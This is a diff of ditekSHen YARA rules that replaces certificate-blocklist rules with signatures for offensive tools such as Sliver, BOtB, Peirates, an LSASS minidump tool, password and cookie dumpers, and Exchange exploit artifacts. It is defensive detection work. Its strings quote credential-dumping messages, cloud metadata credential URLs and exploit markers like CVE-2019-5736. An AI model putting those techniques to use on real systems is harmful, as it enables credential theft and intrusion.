+rule DITEKSHEN_INDICATOR_TOOL_PET_Peirates : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Kubernetes penetration tool Peirates"
 		author = "ditekSHen"
-		id = "a9924b9e-381a-58b2-8839-fcafeb730a32"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "74ce83ed-0d93-5cb0-97e8-6885ae83b336"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3082-L3093"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L677-L694"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3ec4fcd47867b688241dee693bcec98e633e179757ec8e7afd755c7d53a0cd7"
+		logic_hash = "321f06af098283638f99d027dc3c95a25a72192a25c7afa5081a7dbff8c3acb7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1e708efa130d1e361afb76cc94ba22aca3553590"
-		importance = 20
+
+	strings:
+		$s1 = "DeprecatedServiceAccount" fullword ascii
+		$s2 = "LivenessProbe" fullword ascii
+		$s3 = "\\t\\tkubectl expose rs nginx --port=80 --target-port=8000" ascii
+		$s4 = "\\t\\tkubectl run hazelcast --image=hazelcast --port=5701" ascii
+		$s5 = "COMPREPLY[$i]=${COMPREPLY[$i]#\"$colon_word\"}" ascii
+		$s6 = "%*polymorphichelpers.HistoryViewerFunc" ascii
+		$s7 = "ListenAndServeTLS" ascii
+		$s8 = "DownwardAPI" ascii
+		$s9 = "; plural=(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2);proto:" ascii
+		$s10 = "name: attack-" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Badfcbdbcdbfafcaeebad" and pe.signatures [ i ] . serial == "3d:31:ed:3b:22:86:7f:42:5d:b8:6f:b5:32:eb:44:9f" )
+		uint16( 0 ) == 0x457f and 9 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_531549Ed4D2D53Fc7E1Beb47C6B13D58 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Botb : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Break out the Box (BOtB)"
 		author = "ditekSHen"
-		id = "6aec64ae-cda3-57e8-94c6-07c1e07d34ad"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "acafa6dd-51b9-5945-b1df-7763a97a424f"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3095-L3106"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L696-L710"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "554574657a913dbe0c576dbfcdd93a2494f2ffccf51eaabf06e5fafe2a895c3a"
+		logic_hash = "a01f796b27852f9217d9bfea32f8d9ffb3c88521d4413f6612f7a0544cf44fb3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a8e1f6e32e5342265dd3e28cc65060fb7221c529"
-		importance = 20
+
+	strings:
+		$s1 = "to unallocated span%%!%c(*big.Float=%s), RecursionDesired: /usr/share/zoneinfo//{Bucket}/{Key+}?acl/{Bucket}?accelerate/{Bucket}?encryption/{Bucket}?" ascii
+		$s2 = "exploit CVE-2019-5736 with command: [ERROR] In Enabling CGROUP Notifications -> 'echo 1 > [INFO] CGROUP may exist, attempting exploit regardless" ascii
+		$s3 = "main.execShellCmd" ascii
+		$s4 = "[*] Data uploaded to:[+]" ascii
+		$s5 = "whitespace or line breakfailed to find credentials in the environment.failed to get %s EC2 instance role credentialsfirst" ascii
+		$s6 = "This process will exit IF an EXECVE is called in the Container or if the Container is manually stoppedPerform reverse DNS lookups" ascii
+		$s7 = "http: request too largehttp://100.100.100.200/http://169.254.169.254/index out of range" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdabfbdfbcbab" and pe.signatures [ i ] . serial == "53:15:49:ed:4d:2d:53:fc:7e:1b:eb:47:c6:b1:3d:58" )
+		uint16( 0 ) == 0x457f and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_8035Ed9C58Ea895505B05Ff926D486Bc : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_LSASS_Createminidump : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CreateMiniDump tool"
 		author = "ditekSHen"
-		id = "35b5d9a1-eaa8-53d8-9917-9a688fb95a04"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0d8642d1-2ed9-5270-a54a-6ba788026f5f"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3108-L3119"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L712-L724"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "caf1c962a0f4bd6c90753c6f1f0a2acadafa5fde6c7dacd02a3ca5cc15446ab4"
+		logic_hash = "577ccc783554363c0bed80d9642e8a0f107fc2ec66d84f76b9556aa3506c86c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b82a7f87b7d7ccea50bba5fe8d8c1c745ebcb916"
-		importance = 20
+
+	strings:
+		$s1 = "lsass.dmp" fullword wide
+		$s2 = "lsass dumped successfully!" ascii
+		$s3 = "Got lsass.exe PID:" ascii
+		$s4 = "\\experiments\\CreateMiniDump\\CreateMiniDump\\" ascii
+		$s5 = "MiniDumpWriteDump" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fecddacdddfaadcddcabceded" and pe.signatures [ i ] . serial == "80:35:ed:9c:58:ea:89:55:05:b0:5f:f9:26:d4:86:bc" )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Ca646B4275406Df639Cf603756F63D77 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Browserpassworddumper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SecurityXploded Browser Password Dumper tool"
 		author = "ditekSHen"
-		id = "46603413-3e03-57d0-a141-1fee730de6c5"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ce90ef96-43c0-5d68-ba7d-21aafb3f754b"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3121-L3135"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L726-L737"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "564ca7048413d6cd65371d65906132f62386410442b36b8bafeac5e09917465f"
+		logic_hash = "b3c6e9b393c244c7bf6489f54ebd622a09da050a65d6dbde325d5bcd7d85f39a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2a68cfad2d82caae48d4dcbb49aa73aaf3fe79dd"
-		importance = 20
+
+	strings:
+		$s1 = "\\projects\\windows\\BrowserPasswordDump\\Release\\FireMaster.pdb" ascii
+		$s2 = "%s: Dumping passwords" fullword ascii
+		$s3 = "%s - Found login data file...dumping the passwords from file %s" fullword ascii
+		$s4 = "%s Dumping secrets from login json file %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E267Fdbdc16F22E8185D35C437F84C87 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Ftppassworddumper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SecurityXploded FTP Password Dumper tool"
 		author = "ditekSHen"
-		id = "520e335d-4b9f-5006-959a-1510312807be"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d876c201-b527-531c-9563-0b1a1c6334cb"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3137-L3148"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L739-L750"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "403f0f8a65997d27494d7ac4aa99cf5ebb1471839f67b2f8b380225a0263fd67"
+		logic_hash = "941bfb9b1ce71252c5aa05bd654bdcf1af6cc1d5f720bc2c239e17454f15beda"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cdf4a69402936ece82f3f9163e6cc648bcbb2680"
-		importance = 20
+
+	strings:
+		$s1 = "\\projects\\windows\\FTPPasswordDump\\Release\\FireMaster.pdb" ascii
+		$s2 = "//Dump all the FTP passwords to a file \"c:\\passlist.txt\"" ascii
+		$s3 = "//Dump all the FTP passwords to console" ascii
+		$s4 = "FTP Password Dump" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APOTHEKA, s.r.o." and pe.signatures [ i ] . serial == "00:e2:67:fd:bd:c1:6f:22:e8:18:5d:35:c4:37:f8:4c:87" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Taffias : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Emailpassworddumper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SecurityXploded Email Password Dumper tool"
 		author = "ditekSHen"
-		id = "7ace9b76-104c-511a-801b-0c2d5860eaba"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "25e140de-4a0a-5d4f-a93f-a414b9879f2b"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3150-L3161"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L752-L764"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc6b65757ceb3818101c8694680d1f44af3726876bef30843cfc2cb51ec6ea02"
+		logic_hash = "7f07611385d45bf45bfb8ee95e56febfb992fb7b416321c5b590878636a5c1b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "88d563dccb2ffc9c5f6d6a3721ad17203768735a"
-		importance = 20
+
+	strings:
+		$s1 = "\\projects\\windows\\EmailPasswordDump\\Release\\FireMaster.pdb" ascii
+		$s2 = "//Dump all the Email passwords to a file \"c:\\passlist.txt\"" ascii
+		$s3 = "EmailPasswordDump" fullword wide
+		$s4 = "//Dump all the Email passwords to console" ascii
+		$s5 = "Email Password Dump" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAFFIAS" and pe.signatures [ i ] . serial == "00" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_9F2492304Fc9C93844Dea7E5D6F0Ec77 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpsphere : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SharpSphere red teamers tool to interact with the guest operating systems of virtual machines managed by vCenter"
 		author = "ditekSHen"
-		id = "73acca59-8362-5d34-b28a-71d141d3013a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "878b5174-2368-5fc8-9573-7b2759cab409"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3163-L3174"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L766-L783"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9c76d5756cc79e96d194addc0e2c2c11fa4341ffa9df8f171f35df76cb9c56c0"
+		logic_hash = "aae9355fcc7a6b5faf3807c85983032519550e936d5660c823d13731083be512"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "33015f23712f36e3ec310cfd1b16649abb645a98"
-		importance = 20
+
+	strings:
+		$s1 = "get_virtualExecUsage" fullword ascii
+		$s2 = "Command to execute" fullword ascii
+		$s3 = "<guestusername>k__" ascii
+		$s4 = ".VirtualMachineDeviceRuntimeInfoVirtualEthernetCardRuntimeState" ascii
+		$s5 = "datastoreUrl" ascii
+		$s6 = "SharpSphere.vSphere." ascii
+		$s7 = "HelpText+vCenter SDK URL, i.e. https://127.0.0.1/sdk" ascii
+		$s8 = "[x] Execution finished, attempting to retrieve the results" fullword wide
+		$s9 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s10 = "C:\\Users\\Public\\" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bbddebeea" and pe.signatures [ i ] . serial == "9f:24:92:30:4f:c9:c9:38:44:de:a7:e5:d6:f0:ec:77" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Dca9012634E8B609884Fe9284D30Eff5 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Exchangeexploit : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for executables potentially embedding Exchange Server exploitation artificats"
 		author = "ditekSHen"
-		id = "f22ef616-c7f1-5036-b303-ef8ae038ec4f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "429f738a-009a-5326-92e0-bdc907be96f2"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3176-L3189"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L785-L798"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b5d663228a27d5dae46f9f03bd04833b129fc453852cb9cb9fe43e405cdcecca"
+		logic_hash = "4b0d22a296cab6591d63568aa44845ef7fcc413d45c368a712928411d11a8177"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
-		thumbprint = "60971c18c7efb4a294f1d8ee802ff3d581c77834"
-		importance = 20
+
+	strings:
+		$s1 = "ecp/default.flt?" ascii wide nocase
+		$s2 = "owa/auth/logon.aspx?" ascii wide nocase
+		$s3 = "X-AnonResource-Backend" ascii wide
+		$s4 = "EWS/Exchange.asmx?" ascii wide nocase
+		$s5 = "X-BEResource" ascii wide
+		$s6 = "https://%s/owa/auth/" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bebaeefaeba" and ( pe.signatures [ i ] . serial == "dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" or pe.signatures [ i ] . serial == "00:dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_781Ec65C3E38392D4C2F9E7F55F5C424 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Goclr : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects binaries utilizing Go-CLR for hosting the CLR in a Go process and using it to execute a DLL from disk or an assembly from memory"
 		author = "ditekSHen"
-		id = "d056fb18-e641-50bb-af86-ea124203f16c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "21766cad-17dd-525a-9ebe-cd90e892cff1"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3191-L3202"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L800-L814"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "00b01a874e29fd2e25200f5e50c7121c3cc4bca614c31dd149d6197088292b35"
+		logic_hash = "a2a79793b1f530bcf9f79983f29a655f270cf0147606690b19eaeb82d4bd1f0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5d20e8f899c7e48a0269c2b504607632ba833e40"
-		importance = 20
+
+	strings:
+		$s1 = "github.com/ropnop/go-clr.(*IC" ascii
+		$s2 = "EnumKeyExWRegEnumValueWRegOpenKeyExWRtlCopyMemoryRtlGetVersionShellExecuteWStartServiceW" ascii
+		$c1 = "ICorRuntimeHost" ascii wide
+		$c2 = "CLRCreateInstance" ascii wide
+		$c3 = "ICLRRuntimeInfo" ascii wide
+		$c4 = "ICLRMetaHost" ascii wide
+		$go = "Go build ID:" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Facacafbfddbdbfad" and pe.signatures [ i ] . serial == "78:1e:c6:5c:3e:38:39:2d:4c:2f:9e:7f:55:f5:c4:24" )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 2 of ( $c* ) and $go )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Bd1E93D5787A737Eef930C70986D2A69 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Edgecookiesview : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects EdgeCookiesView"
 		author = "ditekSHen"
-		id = "3b5ec355-9d68-5285-bda0-ddd379ad1cf8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "42c6eb2e-bf5c-5956-9009-c29551ce715d"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3204-L3215"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L833-L847"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0332d05f0f53ad22516fd41cb10238ad0b92ef49011e9e71a82fa2da1de5e953"
+		logic_hash = "9ba6d416e02c1958806356c67636609dcca758da9f7e3d1fc15244cc5ff038fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "921e5d7f9f05272b566533393d7194ea9227e582"
-		importance = 20
+
+	strings:
+		$s1 = "AddRemarkCookiesTXT" fullword wide
+		$s2 = "# Netscape HTTP Cookie File" fullword wide
+		$s3 = "/scookiestxt" fullword wide
+		$s4 = "/deleteregkey" fullword wide
+		$s5 = "Load cookies from:" wide
+		$s6 = "Old cookies folder of Edge/IE" wide
+		$pdb = "\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdefedddbdedbcbfffbeadb" and pe.signatures [ i ] . serial == "bd:1e:93:d5:78:7a:73:7e:ef:93:0c:70:98:6d:2a:69" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_B0009Bb062F52Eb6001Ba79606De243D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sharpnopsexec : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SharpNoPSExec"
 		author = "ditekSHen"
-		id = "41293f0b-604a-5993-8b05-9ca639828eec"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "10898364-6d77-5127-a16b-5fd3b1c652d5"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3217-L3228"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L849-L864"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "111a08d62f483daf23220e7044cc291b6ea6922746d48934f72a892b7dfd762b"
+		logic_hash = "c1d76639e7b6464d302729b48bbcd810216132868035904bb9866e7b31ccfac2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c89f06937d24b7f13be5edba5e0e2f4e05bc9b13"
-		importance = 20
+
+	strings:
+		$s1 = "|-> Service" wide
+		$s2 = "authenticated as" wide
+		$s3 = "ImpersonateLoggedOnUser failed. Error:{0}" wide
+		$s4 = "uPayload" fullword ascii
+		$s5 = "pcbBytesNeeded" fullword ascii
+		$s6 = "SharpNoPSExec" ascii wide
+		$pdb1 = "SharpNoPSExec\\obj\\Debug\\SharpNoPSExec.pdb" ascii
+		$pdb2 = "SharpNoPSExec\\obj\\Release\\SharpNoPSExec.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbfdddcfabc" and pe.signatures [ i ] . serial == "b0:00:9b:b0:62:f5:2e:b6:00:1b:a7:96:06:de:24:3d" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_294E7A2Ccfc28Ed02843Ecff25F2Ac98 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Chromecookiesview : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ChromeCookiesView"
 		author = "ditekSHen"
-		id = "ae3c0758-7863-54eb-a94f-3c86d5d34d21"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c1b89468-edf2-59d1-89b3-5822fa19d6ab"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3230-L3241"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L866-L880"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "75c3093978875c7e523525a3b64bf985139359d9696fdb9dbd7db3e915043194"
+		logic_hash = "81acd0978fc03525e7092ab51c681b61f9de0252066ce871298e2cd96b1d3024"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a57a2de9b04a80e9290df865c0abd3b467318144"
-		importance = 20
+
+	strings:
+		$s1 = "AddRemarkCookiesTXT" fullword wide
+		$s2 = "Decrypt cookies" wide
+		$s3 = "/scookiestxt" fullword wide
+		$s4 = "/deleteregkey" fullword wide
+		$s5 = "Cookies.txt Format" wide
+		$s6 = "# Netscape HTTP Cookie File" wide
+		$pdb = "\\ChromeCookiesView\\Release\\ChromeCookiesView.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbaadbdcecafdfafbe" and pe.signatures [ i ] . serial == "29:4e:7a:2c:cf:c2:8e:d0:28:43:ec:ff:25:f2:ac:98" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A61B5590C2D8Dc70A31F8Ea78Cda4353 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sliver : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Sliver implant cross-platform adversary emulation/red team"
 		author = "ditekSHen"
-		id = "0a22b3a5-cc61-5aec-9fc7-bbd03cd4ab03"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e0c5404b-8e6b-5c3a-9e37-56012c3802dd"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3243-L3254"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L882-L900"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d57f5cb2691d8dfb5f5ef63f7bfb4290f0bd8d990c61fe0655e35c1b3f554f0"
+		logic_hash = "4f9442b74c84c7b4a8fcf93de2919d12efe2f41d0b4e8514b43822fba0962af2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d1f77736e8594e026f67950ca2bf422bb12abc3a"
-		importance = 20
+
+	strings:
+		$x1 = "github.com/bishopfox/sliver/protobuf/sliverpbb." ascii
+		$s1 = ".commonpb.ResponseR" ascii
+		$s2 = ".PortfwdProtocol" ascii
+		$s3 = ".WGTCPForwarder" ascii
+		$s4 = ".WGSocksServerR" ascii
+		$s5 = ".PivotEntryR" ascii
+		$s6 = ".BackdoorReq" ascii
+		$s7 = ".ProcessDumpReq" ascii
+		$s8 = ".InvokeSpawnDllReq" ascii
+		$s9 = ".SpawnDll" ascii
+		$s10 = ".TCPPivotReq" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdddcfaebffbfdcabaffe" and pe.signatures [ i ] . serial == "a6:1b:55:90:c2:d8:dc:70:a3:1f:8e:a7:8c:da:43:53" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 1 of ( $x* ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_21C9A6Daff942F2Db6A0614D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Owlproxy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for OwlProxy"
 		author = "ditekSHen"
-		id = "e09476f7-d48d-58e5-aeca-fffacf569243"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "86e2144e-c5d3-5bd6-b287-1157066126a3"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3256-L3267"
